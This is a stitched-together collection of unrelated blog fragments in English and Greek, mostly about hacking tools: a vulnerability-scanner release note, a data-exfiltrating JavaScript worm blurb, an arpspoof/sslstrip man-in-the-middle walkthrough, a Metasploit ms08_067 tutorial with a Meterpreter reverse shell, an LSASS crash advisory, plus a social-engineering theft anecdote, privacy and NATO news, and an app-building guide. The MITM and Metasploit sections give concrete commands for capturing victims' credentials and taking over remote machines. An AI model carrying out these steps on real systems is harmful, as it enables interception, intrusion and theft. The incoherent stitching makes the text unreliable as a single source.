As the first program of 2014 I bring you the new version of my ParanoicScan in its version 1.7, while some people stole the source code of the previous version of this program code, the issue is that not bother me that you used the code but only changed him the program name and the name of the author did not bother to change the names of the variables only changed the name of the author, for a moment hesitate to continue to share the code of this 2-year project working but despite that I continue to share the code of this program, besides explorer (of perlenespanol) recommended me to do another version of this program was to demonstrate that the real author so that the program has the dual function and arrange countless bugs that were in all the code.
[++] Old Options
Google & Bing Scanner that also scan :
XSS
SQL GET / POST
SQL GET
SQL GET + Admin
Directory listing
MSSQL
Jet Database
Oracle
LFI
RFI
Full Source Discloure
HTTP Information
SQLi Scanner
Bypass Admin
Exploit FSD Manager
Paths Finder
IP Locate
Crack MD5
Panel Finder
Console
[++] Fixes
[+] Refresh of existing pages to crack md5 [+] Error scanner fsd [+] Http error scanner scan [+] Spaces between text too annoying [+] Added array to bypass [+] Failed to read from file
[++] New options
[+] Generate all logs in a html file [+] Incorporates random and new useragent [+] Multi encoder / decoder :
Ascii
Hex
Url
Bin To Text & Text To Bin
[+] PortScanner [+] HTTP FingerPrinting [+] CSRF Tool [+] Scan XSS [+] Generator for XSS Bypass [+] Generator links to tiny url [+] Finder and downloader exploits on Exploit-DB [+] Mysql Manager [+] Tools LFI
Little Docter is a JavaScript worm that can exfiltrate files, microphone, webcam, and other data; first demo'd at Kiwicon X.
Setup
Install docker, then edit the docker-compose.yml to your liking and execute docker-compose up or if you've broght your own server just drop the main.js file into any origin you can.
First, we need to install the tools required, which are arpspoof and sslstrip. arpspoof comes with the dsniff suite and you can try to compile dsniff manually but I used macports to do it. Here are the steps I took :-
Download the installation package from macportshere.
Install it by opening and following through the installation. Straightforward.
Open up a Terminal window.
Do an update, by typing sudo port -d selfupdate
Install dsniff, by typing sudo port install dsniff. The command should take a while but fail eventually. (may have changed, if it doesn't fail, skip to step 10.)
One of the dependancies for dsniff is libnids. And one of the dependancies of libnids is libnet. It turns out that the default variant is libnids +libnet11, which will not work. So we need to uninstall libnids, and install the other variant. Do this with
sudo port uninstall libnids
sudo port install libnids +libnet
Try sudo port install dsniff again. It should work this time.
arpspoof should have been installed. You can test it out from the Terminal window by typing arpspoof -h.
Installing sslstrip
We need some python packages that are needed by sslstrip. Install them by typing this in a Terminal window
sslstrip should now be working from the decompressed archive. You can test it out from the Terminal window by typing python sslstrip.py -h from the sslstrip-0.9.2 folder.
Getting ready to run
Run the following commands. They allow you to use your mac to forward any incoming ip packets.
At this point, you can choose to modify sslstrip. I preferred a cleaner output so I added in a try-catch at the following lines in the ServerConnection.py file.
try:
HTTPClient.handleResponseEnd(self)
except:
pass I also made some other changes. In particular, I made the log level to be debug mode, so I can see them from the log file generated, if I need to. Important data I made to print out from the console, such as urls, logins, and passwords.
We need to do port redirection of traffic. The usual packet firewall ipfw did not work - it was slated to be deprecated in Mountain Lion. Instead I used pf (for Packet Filter) instead. Make a backup of the file /etc/pf.conf, and save it somewhere, e.g. pf_mod.conf.
Specifically, we want to redirect all http traffic to our localhost at a specified port, say 8080. Insert the following line in the beginning of the file. This line says to redirect all incoming traffic from the interface en1, with any source and any destination address, but port 80 to localhost (127.0.0.1) on port 8080. Assuming en1 is the interface name you are using.
rdr pass on en1 proto tcp from any to any port 80 -> 127.0.0.1 port 8080
Run sudo pfctl -e -f pf_mod.conf. This command enables the packet filter and to take its rules from the pf_mod.conf file. (To disable after you're done, simply do the same command with the backup file that you copied in step 3. You may also want to type sudo pfctl -d to disable the packet filter, if it was disabled in the first place.)
Start sslstrip by typing python sslstrip.py -p -k -l 8080 -w ./sslstrip.log. Here, we are specifying that we only want to see secure post data, kill sessions, to listen at port 8080, and all output to be written to the file sslstrip.log. If run sucessfully, it should say that it is running.
Choose a target IP address, say 192.168.1.20. You can find this out using nmap. Also, find out now where your router is, say 192.168.1.1. You can find this out using netstat -rn, and looking at the default gateway. Now type in the following command in a new Terminal window.
arpspoof -i en1 -t 192.168.1.20 192.168.1.1
You should be getting your credentials in your sslstrip.log file, when the target logins to a secure website.
Credits to Moxie for sslstrip and Dug Song for arpspoof.
Αυτό το παράδειγμα είναι αυτούσιο από το βιβλίο Social Engineering The Art of Human Hacking του Christopher Hadnagy και θα το παραθέσω μεταφρασμένο.
O C.H. λοιπόν μας μιλάει για την εμπειρία του όταν προσφέρθηκε να δείξει σε ένα show του BBC πόσο εύκολο θα ήταν όχι μόνο να κλέψει την τσάντα μιας γυναίκας και να πάρει την πιστωτική της κάρτα αλλά και τον κωδικό. Το BBC ασφαλώς είπε ότι αυτό δεν πρόκειται να συμβεί. Ο ίδιος με την ομάδα του ήξεραν ότι μπορούσαν να το κάνουν αφού είχαν αναφερθεί τέτοιου είδους απάτες.
Για να διαδραματίσουν λοιπόν το "πείραμα"τους πήγαν σε μια τοπική καφετέρια. Η καφετέρια ήταν στον ψηλότερο όροφο ενώς πολυκαταστήματος στην Oxford Street. Ήταν σχεδόν άδειο και αυτός έκατσε σε ένα άδειο τραπέζι φορώντας ένα "επαγγελματικό"κουστούμι, άφησε τον χαρτοφύλακα του στο τραπέζι και περίμενε για το κατάλληλο θύμα. Μετά από λίγη ώρα το κατάλληλο θύμα έφτασε μαζί με ένα φίλο του και κάτσανε στο διπλανό τραπέζι και το θύμα (η γυναίκα) άφησε την τσάντα στην καρέκλα δίπλα και είχε όλη την ώρα πάνω από αυτήν το χέρι της όπως κάνουν οι περισσότερες γυναίκες.
Ο ίδιος λέει ότι έπρεπε να κλέψει ολόκληρη την τσάντα της ενώ είχε το χέρι της συνέχεια από πάνω και ο φίλος της καθόταν ακριβώς απέναντι οπότε τα πράγματα άρχισαν να δυσκολεύουν. Μετά από λίγο όμως ο φίλος της πήγε στην τουαλέτα και τότε το θύμα έμεινε μόνο του. Ο C.Η. έδωσε το "σήμα"στον Alex και την Jess (μέλη της ομάδας).
Αυτοί λοιπόν έπαιξαν το ρόλο του ζευγαριού και πήγαν και ζήτησαν από το θύμα να τους βγάλει μια φωτογραφία, και το θύμα ήταν ευπρόσδεκτο να το κάνει. Έβγαλε το χέρι της από την τσάντα για να πάρει την φωτογραφική και να βγάλει φωτογραφία το "Ευτυχισμένο ζευγάρι"και όσο το έκανε αυτό ο C.H. πλησίασε και πήρε την τσάντα της και την έβαλε ψύχραιμα στο χαρτοφύλακα του.
Το θύμα δεν πρόσεξε ότι η καρέκλα ήταν άδεια και ο Alex με την Jess έφυγαν από την καφετέρια και ο Alex πήγε γρήγορα στο πάρκινγκ. Δεν πήρε πολύ στο θύμα για να καταλάβει ότι λείπει η τσάντα του και τότε άρχισε να πανικοβάλεται. Σηκώθηκε και κοίταξε τριγύρω με νευρικότητα. ( Αυτό ήταν που ευχόμασταν να συμβεί). Ο C.H. την ρώτησε αν χρειαζόταν βοήθεια και εκείνει τον ρώτησε αν είχε δει τίποτα. Ο ίδιος απάντησε πως δεν είδε τίποτα και την έπεισε να κάτσει κάτω να ηρεμήσει και να σκεφτεί τι ήταν μέσα στην τσάντα της. Το τηλέφωνο της, το make up, μερικά χρήματα και οι πιστωτικές της κάρτες!
Στη συνέχεια την ρώτησε σε ποια τράπεζα είχε τις κάρτες και της είπε ότι δουλεύει σε αυτήν την τράπεζα. Τι μεγάλη τύχη! Την βεβαίωσε ότι όλα θα πάνε καλά, απλά έπρεπε να ακυρώσει τις κάρτες της αμέσως. Ο C.H. κάλεσε την "τράπεζα"που στην πραγματικότητα ήταν ο Alex και έδωσε το τηλέφωνο στο θύμα. Το πήρε και τότε ήταν πάνω στον Alex αν θα τα καταφέρει.
Ο ίδιος ήταν σε ένα βανάκι στο πάρκινγκ και είχε βάλει ήχο από φασαρία γραφείου που είχε κατεβάσει από το ίντερνετ να παίζει. Ηρέμησε το θύμα και την επιβεβαίωσε ότι μπορεί εύκολα να ακυρώσει τις κάρτες της απλά θα έπρεπε να πληκτρολογίσει το Pin της κάρτας της στο πληκτρολόγιο του τηλεφώνου για να εξακριβώσει τα στοιχεία της.
Όπως λέει ο C.H. : Το τηλέφωνο μου, και το πληκτρολόγιο μου.
Μπορείτε να μαντάψετε τα υπόλοιπα. Μόλις πήραμε το PIN έφυγα και την άφησα με τον φίλο της και κατευθήνθηκα προς την πόρτα. Αν είμασταν πραγματικοί κλέφτες θα είχαμε πρόσβαση στο λογαριασμό της και θα μπορούσαμε να πάρουμε τα πάντα.
Ευτυχώς γι αυτήν ήταν μόνο ένα TV show και ήταν χαρούμενη που όταν γύρισα της επέστρεψα της τσάντα και ήξερε ότι όλα ήταν ένα show. Με ευχαρίστησε ακόμα που της έδωσα την τσάντα και εγώ της απάντησα, Μην με ευχαριστείς, εγώ είμαι αυτός που στην έκλεψε.
Θα μπορούσαμε να το αποκαλέσουμε και κράχτη αφού αποτελεί ουσιαστικό μέρος της εργαλειοθήκης μας όταν είμαστε συνδεδεμένοι στο διαδίκτυο και προστατεύει την ιδιωτική μας ζωή. Αυτό που οι περισσότεροι χρήστες δεν συνειδητοποιούν, αναφέρει το περιοδικό MIT Technology Review, είναι ότι η Evidon που είναι μητρική εταιρεία της Ghostery, συλλέγει τα δεδομένα των χρηστών και τα πωλεί στους διαφημιστές.
Θα πρέπει να καταστεί σαφές ότι αν επιλέξετε να ξεκλικάρετε την επιλογή για κοινή χρήση πληροφοριών εντός της Ghostery, τότε αυτομάτως αποκλείεται η συλλογή των δεδομένων σας και η Evidon συμμορφώνεται με τις πληροφορίες αυτού το αιτήματος.
Ο συν-ιδρυτής και Διευθύνων Σύμβουλος της Evidon, ο Scott Meyer, λέει ότι δεν υπάρχει καμμία σύγκρουση των δύο ρόλων της εταιρείας του που διαδραματίζει έναν καίριο ρόλο καθώς προσφέρει στους χρήστες ένα εργαλείο που τους κρύβει από τον κλάδο της διαφήμισης ενώ παράλληλα παρέχει δεδομένα σχετικά με τους χρήστες σε διαφημιστικές εταιρείες. Οτιδήποτε δίνει στους ανθρώπους περισσότερη διαφάνεια και έλεγχο, είναι καλό για τη βιομηχανία, λέει ο Meyer. Η Evidon προωθεί δύο υπηρεσίες στους πελάτες της. Το πρώτο της προφίλ είναι αυτό που μπλοκάρει τον κώδικα παρακολούθησης των ιστοσελίδων, και επιτρέπει στους διαχειριστές του site να βλέπουν από πού προέρχεται η παρακολούθηση και πώς αυτή επηρεάζει την ταχύτητα των σελίδων τους. Το δεύτερο προφίλ της Evidon παρέχει στους διαφημιστές στατιστικά στοιχεία σχετικά με τον τρόπο που οι συνήθεις trackers άλλων εταιρειών, δηλαδή όλοι αυτοί οι… καλόβουλοι άνθρωποι που προσπαθούν να αντλήσουν τα δεδομένα μας, κινούνται στο Διαδίκτυο.
Το πρώτο προφίλ, λέει ο Meyer, είναι πολύ σημαντικό, διότι οι ιδιοκτήτες συχνά δεν συνειδητοποιούν τι κώδικα παρακολούθησης χρησιμοποιούν για τους επισκέπτες τους οι άλλοι δικτυακοί τόποι. Είναι κάτι σύνηθες για τον χειριστή μιας ιστοσελίδας.
Όχι βέβαια πως ο καθένας από εμάς μπορεί να είναι πεπεισμένος ότι η δυαδικότητα του ρόλου της Evidon που με το ένα πόδι προασπίζει την ιδιωτικότητα των καταναλωτών και με το άλλο πόδι δίνει τα στοιχεία τους στον κλάδο της διαφήμισης, είναι τόσο ακίνδυνη όσο ισχυρίζεται ο Meyer.
Η Evidon πωλεί ένα σημαντικό ποσοστό των δεδομένων των χρηστών της σε εταιρείες διαφήμισης, θέλοντας να διασφαλίσει τη συμφωνία τους με το πρόγραμμα AdChoices. Το AdChoices υποτίθεται ότι υπάρχει για να βοηθήσει τους ανθρώπους να απαλλαγούν από στοχευμένες διαφημίσεις από τη στιγμή που θα επιλέξουν να μην έχουν ενεργοποιημένη την επιλογή αυτή. Την ίδια στιγμή, όμως, η Evidon έχει έννομο συμφέρον στο να επιδιώκει την επιτυχία του προγράμματος AdChoices, προκειμένου να ανταγωνιστεί άλλες εναλλακτικές λύσεις όπως το «Do Not Track», που έρχεται πλέον ως πρότυπο σε ορισμένα προγράμματα περιήγησης.
Σε αυτό το tutorial θα δούμε έναν από τους τρόπους με τους οποίους μπορούμε να αποκτήσουμε τον έλεγχο σε ένα απομακρυσμένο υπολογιστή με τη χρήση του ms08_067_netapi exploit.
Ανοίγω ένα τερματικό... Terminal: root@bt:msfconsole <- font="">-> [περιμένουμε να ενεργοποιηθεί λίγο το msfconsole]... msf > search ms08_067_netapi <- font="">->
[*] Searching loaded modules for pattern 'ms08_067_netapi'... Exploits ======== Name ---- windows/smb/ms08_067_netapi Corruption Rank ---- great Description ----------- Microsoft Server Service Relative Path Stack
[*] Started reverse handler on 192.168.33.129:8080 [*] Triggering the vulnerability... [*] Sending stage (748032 bytes) [*] Meterpreter session 1 opened (192.168.33.129:8080 -> 192.168.33.130:1487)
Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>->->->->->->-> GAME OVER!!!
Όπως φαίνεται παραπάνω μπήκαμε στον υπολογιστή του θύματος μας και έχουμε μπροστά μας το μενού εντολών του MS-DOS... Από εκεί και πέρα μπορούμε να κάνουμε ότι θέλουμε αρκεί να γνωρίζουμε έστω και λίγες εντολές του MS-DOS.
ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.
Tο NATO αποτελεί στόχο για πολλούς hackers παγκοσμίως καθώς σύμφωνα με πρόσφατο δημοσίευμα δέχεται κάθε μήνα κατά μέσο όρο 500 επιθέσεις.
Ο Oana Lungescu, εκπρόσωπος του ΝΑΤΟ, δήλωσε στο CNN ότι σημειώνεται αύξηση περίπου 60% του αριθμού των επιθέσεων το 2016 σε σχέση με το 2015. Συνήθως, η ταυτότητα των εισβολέων είναι δύσκολο να προσδιοριστεί παρόλο που γίνονται άμεσα έρευνες για τον εντοπισμό τους. Αναμφίβολα, οι ξένες κυβερνήσεις, οι εγκληματίες και οι τρομοκράτες αποτελούν πιθανή προέλευση των επιθέσεων αλλά σύμφωνα με τους ειδικούς ο υποψήφιος που κερδίζει με διαφορά είναι τα αντίπαλα έθνη.
Το μόνο σίγουρο είναι ότι το ΝΑΤΟ ξέρει πώς να διαχειριστεί την κατάσταση. Συγκεκριμένα, στα μέσα του 2016 προειδοποίησε του hackers ότι αν επιδιώξουν και άλλες επιθέσεις θα έχουν να αντιμετωπίσουν την απάντηση του συνόλου της συμμαχίας στο πλαίσιο του “Article V”, το σύμφωνο της αμοιβαίας άμυνας. «Έχουμε αποφασίσει στην επόμενη διαδικτυακή επίθεση να ανταποδώσουμε με παρόμοιο τρόπο όλο το σύνολο της συμμαχίας ενωμένο» προειδοποίησε ο Jens Stoltenberg. Συνεχίζοντας ο κύριος Stoltenberg τόνισε ότι λαμβάνουν πολύ σοβαρά τις επιθέσεις στον κυβερνοχώρο τους και τις αντιμετωπίζουν με τον ίδιο τρόπο που θα έκαναν σε περίπτωση ένοπλης επίθεσης.
Σύμφωνα με φήμες η Ρωσία είναι η πιθανή χώρα που κρύβεται πίσω από τις επιθέσεις αυτές μια τακτική που ακολούθησε και στις ΗΠΑ κατά την διάρκεια της εκλογικής αναμέτρησης του 2016. Δεδομένου αυτού οι ευρωπαϊκές κυβερνήσεις βρίσκονται σε επιφυλακή για μελλοντικές επιθέσεις από την ρωσική πλευρά κατά την διάρκεια των δικών τους εκλογικών αναμετρήσεων.
Από την άλλη πλευρά, η Ρωσία αρνείται τις κατηγορίες αυτές υποστηρίζοντας πως όχι απλά δεν είναι ο θύτης αλλά είναι το θύμα παρόμοιων επιθέσεων.
Έχετε μια ιδέα για μια φοβερή εφαρμογή και δεν μπορείτε να ησυχάσετε αν δεν την κατασκευάσετε. Αλλά δεν ξέρετε τίποτα από προγραμματισμό και δεν έχετε ιδέα για το πώς να ξεκινήσετε.
Αν θέλετε βοήθεια για να υλοποιήσετε την ιδέα σας και να χτίσετε πραγματικά μια επιχείρηση γύρω από αυτήν, εμείς είμαστε εδώ για να βοηθήσουμε!. Αλλά αν θέλετε να βουτήξετε και να χτίσετε πραγματικά κάτι, τότε διαβάστε μια επισκόπηση υψηλού επιπέδου για το από που να ξεκινήσετε, με μια σειρά από διαφορετικές προσεγγίσεις για την οικοδόμηση της εφαρμογής σας. Το σημαντικό πράγμα που πρέπει να θυμάστε είναι πως οτιδήποτε εμπνευστήκατε να φτιάξετε, φτιάξτε το αμέσως., απλώς ξεκινήστε.
Θα κάνουμε την προσέγγιση ξεκινώντας γρήγορα να κατασκευάσουμε ένα ελάχιστο βιώσιμο προϊόν (MVP). Ως εκ τούτου, η πιο σημαντική ερώτηση που πρέπει να κάνετε πρώτα στον εαυτό σας είναι η εξής …
Ερώτηση 1: Τι είδους εφαρμογή θέλω να κατασκευάσω;
Η απάντηση σε αυτό οδηγεί σε δύο άλλα ερωτήματα:
1.Πώς θέλω να την χρησιμοποιήσουν οι άνθρωποι;
2.Τι τεχνολογίες γνωρίζω ή θέλω να μάθω;
Για το πρώτο ερώτημα, θέλετε οι άνθρωποι να τη χρησιμοποιούν ως μια εφαρμογή web σε κοινό επιτραπέζιο ή φορητό υπολογιστή; Μια εφαρμογή για smartphone που θα παίρνουν από ένα κατάστημα εφαρμογών (συνήθως γνωστή ως «native» εφαρμογή); Ή τι θα λέγατε με μια εφαρμογή web αναβαθμισμένη για χρήση smartphone; Ο απώτερος στόχος σας μπορεί να είναι να έχετε όλες αυτές τις επιλογές διαθέσιμες, αλλά αυτό έχει μεγάλη δυσκολία αν ξεκινάτε μόλις τώρα, μόνοι σας. Διαλέξτε μία και συγκεντρωθείτε σ’αυτήν, αλλά να έχετε και άλλες επιλογές υπόψιν, καθώς η πολυπραγμοσύνη θα μπορούσε να επηρεάσει τον τρόπο που σχεδιάζετε.
Η δεύτερη ερώτηση (Τι τεχνολογίες γνωρίζω ή θέλω να μάθω) μπορεί επίσης να παίξει ένα μεγάλο ρόλο στο πώς θέλετε να προχωρήσετε. Στο υπόλοιπο του άρθρου θα προσπαθήσω να παρέχω πληροφορίες για όποια διαδρομή κι αν αποφασίσετε.
Μια Σημείωση για την Αρχιτεκτονική Λογισμικού
Αν έχετε πληροφορίες για την εφαρμογή σας που θέλετε να αποθηκευτούν στο διαδίκτυο- κωδικούς σύνδεσης, φωτογραφίες, αποτελέσματα-οτιδήποτε, τότε θα θέλετε να εξετάσετε μια αρχιτεκτονική επικεντρωμένη στις υπηρεσίες .
Τι πράγμα;
Δεν θέλω να προχωρήσω πάρα πολύ στις λεπτομέρειες εδώ, αλλά παίρνοντας τη σωστή απόφαση εξαρχής μπορεί να σώσει πολύ χρόνο και κόπο στο μέλλον. «Υπηρεσιο-κεντρική-Αρχιτεκτονική» σημαίνει ότι κατασκευάζετε ένα σύστημα όπου η πληροφόρηση και η λειτουργικότητα διατίθεντε στο διαδίκτυο ως κλήσεις service που κάθε εφαρμογή ή πρόγραμμα μπορεί να κάνει και να χρησιμοποιεί.
Φανταστείτε ότι η ιδέα σας περιλαμβάνει φωτογραφίες που εμφανίζονται για το χρήστη. Αν ξεκινήσετε με μία προσέγγιση μόνο βασισμένη στο web, μπορεί να κάνετε το λάθος να ενσωματώσετε στενά την ιστοσελίδα σας με τη βάση δεδομένων των φωτογραφιών, και κάθε φωτογραφία θα μπορούσε να επιστρέψει στο πρόγραμμα περιήγησης με HTML και JavaScript γύρω της για να λειτουργήσει σωστά για το site σας. Αλλά τι συμβαίνει όταν αποφασίσετε να φτιάξετε μια εφαρμογή Android; Τώρα θα θέλετε να ζητήσετε τις ίδιες φωτογραφίες από την εφαρμογή σας, αλλά όλα αυτά τα HTML και JavaScript δε σας κάνουν κανένα καλό.
Αντ ‘αυτού, διασπάτε τα απλούστερα στοιχεία που χρειάζεστε με το απλούστερο δυνατό format (συχνά JSON σήμερα) και να κάνετε αυτό διαθέσιμο ως αίτημα για όποιον το θέλει. Τώρα κάθε ενδιαφερόμενος (ένα πρόγραμμα περιήγησης, μια εφαρμογή smartphone, μια εφαρμογή τηλεόρασης, κλπ.) μπορεί να ζητήσει αυτά τα δεδομένα και να τα χειριστεί με όποιον τρόπο απαιτείται για το συγκεκριμένο περιβάλλον χρήστη.
Ερώτηση 2: Χρειάζομαι νέο υπολογιστή;
Μάλλον όχι! Το μόνο είδος εφαρμογής που μπορεί να σας ζητήσει να αγοράσετε (ή να δανειστείτε) ένα νέο υπολογιστή, είναι μια εφαρμογή iOS , η οποία μπορεί να αναπτυχθεί μόνο σε έναν υπολογιστή Mac. Για μια εφαρμογή web ή Android μπορείτε να χρησιμοποιήσετε οποιοδήποτε υπολογιστή Mac, Windows ή Linux.
Οι καλύτεροι υπολογιστές σίγουρα κάνουν τον προγραμματισμό να κινηθεί λίγο πιο γρήγορα, αλλά δεν είναι απαραίτητο να αγοράσετε νέο υπολογιστή εκτός αν ο σημερινός σας είναι αφόρητα αργός για τον προγραμματισμό. Έχω ένα παλιό laptop HP με Windows 7, το οποίο εξακολουθεί να είναι αξιοπρεπές για την ανάπτυξη Android, και πέρυσι χρησιμοποίησα ενός φίλου ένα παλιό Snow Leopard Macbook για iOS και ήταν πολύ καλό, επίσης. Έτσι, δεν χρειάζεται να ανησυχείτε πάρα πολύ για το πόσο σύγχρονος θα παραμείνει στο χρόνο, αλλά θα θέλετε να έχετε τον καλύτερο υπολογιστή που μπορείτε να αντέξετε οικονομικά.
Για εφαρμογές web, μπορείτε να αρκεστείτε σε οποιοδήποτε παλιό πρόγραμμα επεξεργασίας κειμένου, όπως το NotePad, το TextEdit, ή το Sublime Text 2. Οι εφαρμογές Smartphone, ή οι εφαρμογές για άλλους τύπους συσκευών συνήθως απαιτούν ειδικά προγράμματα που ονομάζονται IDEs, από τις λέξεις «Integrated Development Environment». Αυτά τα εργαλεία σας επιτρέπουν να γράψετε κώδικα και να κατασκευάσετε έργα που μπορούν να τρέχουν σε κινητά τηλέφωνα, tablets, τηλεοράσεις, ή άλλους τύπους συσκευών.
Για εφαρμογές smartphone, τα εργαλεία προγραμματισμού είναι δωρεάν τόσο για iOS (Xcode) όσο και για Android (Eclipse). Η Microsoft επίσης κάνει τη ζωή πιο εύκολη για τους προγραμματιστές που θέλουν να ξεκινήσουν την ανάπτυξη εφαρμογών για τα Windows Phones-Το Visual Studio Express 2012 είναι δωρεάν και είναι παρόμοιο με το Xcode και το Eclipse. Και δεν χρειάζεστε καν ένα smartphone για να δοκιμάσετε αυτές τις πλατφόρμες (αν και θα σας βοηθούσε). Όλα αυτά τα εργαλεία περιέχουν εικονικά τηλέφωνα, που μπορείτε να τρέξετε στον υπολογιστή σας και να χρησιμοποιήσετε για να ελέγξετε την εφαρμογή σας. Οι δοκιμές σε μια συσκευή είναι καλύτερες και γρηγορότερες, αλλά τα εικονικά τηλέφωνα είναι σπουδαία και είναι δωρεάν!
Εάν αναπτύσσετε την εφαρμογή ενός smartphone, μπορεί να θέλετε να εξετάσετε ορισμένες non-native λύσεις, όπως το PhoneGapή το Titanium, που σας επιτρέπουν να γράψετε εφαρμογές για Android, iOS, και το web όλα με τη μία. Το καθένα έχει τα δικά του πλεονεκτήματα και μειονεκτήματα, αλλά έχω δει καλές (όχι σπουδαίες) εφαρμογές χτισμένες με αυτά τα εργαλεία.
Εργαλεία όπως αυτά σας επιτρέπουν να γράψετε μητρικές ή υβριδικές (web εφαρμογές ενσωματωμένες στο μητρικό shell) εφαρμογές που χρησιμοποιούν τις τεχνολογίες web, όπως HTML και JavaScript. Τα εργαλεία δημιουργούν εκδόσεις της εφαρμογής για πολλαπλές πλατφόρμες, και μπορείτε ακόμη να ανεβάσετε τις διαφορετικές εκδόσεις σε μέρη όπως το Google Play και το App Store. Αυτό μπορεί να είναι μια πολύ καλή λύση για ορισμένες εφαρμογές, ή για να ξεκινήσετε γρήγορα, αλλά τελικά μάλλον θα εξυπηρετηθείτε καλύτερα κατασκευάζοντας μητρικές εφαρμογές προσαρμοσμένες σε κάθε πλατφόρμα.
Ερώτηση 4: Πόσο θα κοστίσει;
Η εγγραφή και η φιλοξενία web εφαρμογών απαιτεί συνήθως μια μικρή μηνιαία ή ετήσια συνδρομή, αλλά τα ίδια τα εργαλεία τους είναι συνήθως δωρεάν ή φθηνά.
Τα εργαλεία για smartphone εφαρμογές είναι επίσης δωρεάν, αλλά η δημοσίευση εφαρμογών σε ειδικά καταστήματα έχει ένα μικρό κόστος. Η Apple και η Microsoft χρεώνουν μια ετήσια συνδρομή των $ 100 και η Google χρεώνει ένα εφάπαξ τέλος των $ 25.
Ερώτηση 5: Πώς ξεκινάω να γράφω την εφαρμογή;
Αν δεν έχετε γράψει μια εφαρμογή ποτέ πριν, τότε κατά πάσα πιθανότητα θα θέλετε να χρησιμοποιήσετε μία πηγή, όπως το Treehouse για να εργαστείτε μέσα από κάποια μαθήματα για το πώς να οικοδομήσετε μια απλή web, Android, ή iPhone εφαρμογή. Όσο κι αν φαίνεται διασκεδαστικό να ξεκινήσετε αμέσως και να παίζετε με τον κωδικό, θα χρειαστείτε τουλάχιστον μια βασική κατανόηση, για το πως είναι δομημένες οι εφαρμογές.
Υπάρχουν κι άλλες αναρτήσεις στο blog που μπορούν να σας βοηθήσουν- Απλά κάντε κλικ στο iOS ή Android στο μενού πλοήγησης στην κορυφή του blog για να δείτε όλες τις αναρτήσεις σε κάθε κατηγορία. Υπάρχουν επίσης, κάποιες γρήγορες συμβουλές στο YouTube, που θα μπορούσαν να βοηθήσουν.
Το πρώτο πράγμα που θα θελήσετε να κάνετε εάν χρησιμοποιήσετε μια νέα πλατφόρμα, είτε είναι το διαδίκτυο, το Android, iOS ή Windows Phone, είναι να δημιουργήσετε ένα απλό πρόγραμμα “Hello, World!“, για να βεβαιωθείτε ότι το περιβάλλον προγραμματισμού έχει ρυθμιστεί και λειτουργεί σωστά. Τα προγράμματα “Hello, World!” είναι σπουδαία πρώτα βήματα, επειδή είναι το ελάχιστο που μπορείτε να κάνετε για να τρέξετε ένα ολοκληρωμένο πρόγραμμα. Παρακάτω είναι μερικά καλά άρθρα και βίντεο για το πώς να γράψετε προγράμματα “Hello, World!” για τις διάφορες πλατφόρμες που έχουμε αναφέρει:
Μια σπουδαία πηγή για να μάθετε πώς να κωδικοποιήσετε ορισμένα είδη λειτουργικότητας σε εφαρμογές, είναι το δείγμα του κώδικα που διανέμεται με εργαλεία και πλατφόρμες. Θέλετε να χρησιμοποιήσετε την κάμερα; Υπάρχουν υποδείγματα για να σας δείξουν πώς! Θέλετε να κάνετε την εφαρμογή σας με επίγνωση τοποθεσίας; Υπάρχουν υποδείγματα για να σας δείξουν πώς!
Για τα Android και iOS, κατεβάστε, εξερευνήστε και χρησιμοποιήστε τον κωδικό που διατίθεται στα σχέδια του δείγματος: Android |iOS. Υπάρχει επίσης φανταστική ερμηνεία διαθέσιμη στις ιστοσελίδες των προγραμματιστών για το Android, iOS, Windows Phone, και άλλες πλατφόρμες.
Καλή τύχη με την εφαρμογή σας, και ευτυχισμένη κωδικοποίηση! Αν κάνετε κάτι φοβερό, στείλτε μας ένα σημείωμα στα σχόλια παρακάτω!
A vulnerability in Windows Local Security Authority Subsystem Service (LSASS) was found on Windows OS versions ranging from Windows XP through to Windows 10. This vulnerability allows an attacker to remotely crash the LSASS.EXE process of an affected workstation with no user interaction. Successful remote exploitation of this issue will result in a reboot of the target machine. Local privilege escalation should also be considered likely. Microsoft acknowledged the vulnerability and has published an advisory and a patch, resolving this issue.
Technical details -----------------
This vulnerability affects both LSASS client and server and can be triggered remotely via SMBv1 and SMBv2, during the NTLM message 3 (Authenticate) message. Incoming NTLM messages via SMB are using ASN1 and DER encoding, the first ASN length field can be set to unsigned int by using 0x84. This allows an attacker to remotely allocate a huge chunk of memory, for a message never larger than 20000 chars. The secondary trigger is to set any string fields (User, Domain, session Key, MIC, etc) with a long string (80-140 chars), leading LSASS.exe to crash.
eax=00000000 ebx=000e3e04 ecx=fffffff8 edx=fffffffc esi=000e3e00 edi=00000004 eip=7c84cca2 esp=00aaf9ac ebp=00aaf9d4 iopl=0 nv up ei pl nz ac po cy cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213 ntdll!RtlpWaitOnCriticalSection+0xdf: 7c84cca2 ff4014 inc dword ptr [eax+14h] ds:0023:00000014=????????
- LSASS NegpBuildMechListFromCreds sends a null pointer "creds" to NTDLL RtlEnterCriticalSection. - RtlEnterCriticalSection is used with a null pointer, which triggers the crash.
Impact ------
Successful attempts will result in a remote system crash and possibly local privilege escalation.
Affected products -----------------
Windows: - XP - Server 2003 - 7 - 8 - 2008 - 2012 - 10
Proof of concept ----------------
A proof of concept is available at the following URL: https://github.com/lgandx/PoC/tree/master/LSASS This proof of concept is fully automated and includes non-vulnerable detection.
Solution --------
Install the corresponding MS patch. More details: https://technet.microsoft.com/en-us/library/security/ms16-137.aspx
Response timeline -----------------
* 17/09/2016 - Vendor notified, proof of concept sent. * 28/09/2016 - Issue confirmed by MSRC * 14/10/2016 - Vendor says he plan to release a patch in November, that is 1 month in advance of the scheduled 3 month. * 08/11/2016 - Vendor release MS16-137. * 08/11/2016 - This advisory released.
Responder an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default, the tool will only answer to File Server Service request, which is for SMB.
The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior. You can set the -r option via command line if you want to answer to the Workstation Service request name suffix. Features Built-in SMB Auth server.
